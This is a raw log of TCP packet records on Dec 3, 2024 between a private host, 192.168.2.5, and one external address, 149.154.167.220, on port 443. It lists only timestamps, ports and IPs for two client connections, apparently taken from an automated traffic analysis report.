Dec 3, 2024 14:28:11.785130024 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.785383940 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.785423040 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.785459042 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.785496950 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.785547972 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.785573959 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.785621881 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.817310095 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.817392111 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.817781925 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.817805052 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.818026066 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.818032980 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.818331003 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.818358898 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.818413019 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.818419933 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.818489075 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.818499088 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.818547010 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.818561077 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.818579912 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.818589926 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.818677902 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.818691969 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.818805933 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.818819046 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.818846941 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.818871021 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.818901062 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.818913937 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.818937063 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.818958998 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.819061041 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.819067955 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.819133997 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.819150925 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.819191933 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.819206953 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.819233894 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.819251060 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.819263935 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.819272041 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.819293022 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.819303989 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.819319010 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.819327116 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.819343090 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.819351912 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.819365978 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.819375038 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.819395065 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.819410086 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.819468021 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.819473982 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.819610119 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.819626093 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.819667101 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.819688082 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.819724083 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.819731951 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.819785118 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.819797993 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.819844961 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.819866896 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.819900036 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.819915056 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.819958925 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.819974899 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.819998026 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.820010900 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.820019007 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.820029974 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.820137978 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.820152998 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.820193052 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.820209980 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.820297956 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.820363045 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.820399046 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.820456028 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.820507050 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.831331968 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.831584930 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.831664085 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.831785917 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.831856012 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.831908941 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.831950903 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.831995010 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.832035065 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.832079887 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.832133055 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.849011898 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.849265099 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.849386930 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.849406004 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.849476099 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.849528074 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.849577904 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.849622011 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.849664927 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.849700928 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.849751949 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.849761009 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.849839926 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.849895000 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.852014065 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.852164030 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.852202892 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.852216959 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.852231979 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.852281094 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.852341890 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.852406979 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.852461100 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.852494001 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.852586985 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.852648020 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.852691889 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.852732897 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.852775097 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.867328882 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.867615938 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.867664099 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.867837906 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.867898941 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.867937088 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.867991924 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.895334959 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.895613909 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.895639896 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.895680904 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.895694017 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.895755053 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.895781040 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.895876884 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.895930052 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.895936012 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.895948887 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.895987034 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.896028042 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.896060944 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.896075964 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.896091938 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.896146059 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.915333986 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.915569067 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.915652037 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.915745020 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.915812969 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.915858984 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.939340115 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.939774036 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.939903021 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.939943075 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.939949989 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.939968109 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.940004110 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.940046072 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.940078020 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.940123081 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.940157890 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.940176010 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.959333897 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.959769011 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.959794998 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.959816933 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.959861040 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.959913969 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.971210003 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.971488953 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.971515894 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.971596003 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.971627951 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.971641064 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.971654892 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.971734047 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.971750021 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.971801996 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.971820116 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.971844912 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.971936941 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.972016096 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.972369909 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.972507954 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.972522020 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.972606897 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.972615004 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.972671986 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.972686052 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.972770929 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.972781897 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.972841024 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.972908020 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.973776102 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.003331900 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.003844023 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.003915071 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.004009962 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.004048109 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.004194975 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.004260063 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.051347017 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.051886082 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.051954031 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.051996946 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.052050114 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.052145958 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.060800076 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.061032057 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.061065912 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.061075926 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.061201096 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.061239958 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.061284065 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.061316967 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.061357975 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.103332996 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.104392052 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.302757978 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.559566975 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.559592009 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.570949078 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.570965052 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.571450949 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.571465969 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.571526051 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.571531057 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.571630001 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.571641922 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.571679115 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.571691036 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.571908951 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.571923971 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.571994066 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.572005987 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.572211981 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.572221994 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.572242022 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.572262049 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.572267056 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.572284937 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.572346926 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.572355986 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.572377920 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.572382927 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.572504044 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.572515965 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.572597027 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.572608948 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.572632074 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.572644949 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.572715044 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.572726965 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.572782040 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.572804928 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.572835922 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.572851896 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.572978973 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.573808908 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.573834896 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.573940039 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.573997974 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.574035883 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.574084044 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.574136019 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.574162960 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.574229002 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.577192068 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.588479042 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.588494062 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.588507891 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.588562012 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.588604927 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.588618994 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.588640928 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.588656902 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.588675022 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.588680983 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.588701963 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.588713884 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.588732004 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.588748932 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.588776112 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.588790894 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.588804960 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.588838100 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.588850975 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.588917017 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.588951111 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.589030981 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.589042902 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.589059114 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.589066982 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.589072943 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.589082956 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.589118004 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.589189053 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.589369059 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.589381933 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.589456081 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.589546919 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.589586973 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.589597940 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.589622021 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.589638948 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.589690924 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.589739084 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.589765072 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.589803934 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.589809895 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.631337881 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.631629944 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.631722927 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.631746054 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.631789923 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.631834030 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.631891012 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.631922960 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.631968975 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.631983042 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.675343990 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.675755024 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.675801992 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.675829887 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.675858974 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.675890923 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.675932884 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.675960064 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.675987959 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.675998926 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.699477911 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.700006962 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.700023890 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:12.700037956 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.700107098 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.700135946 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:12.700180054 CET	49804	443	192.168.2.5	149.154.167.220
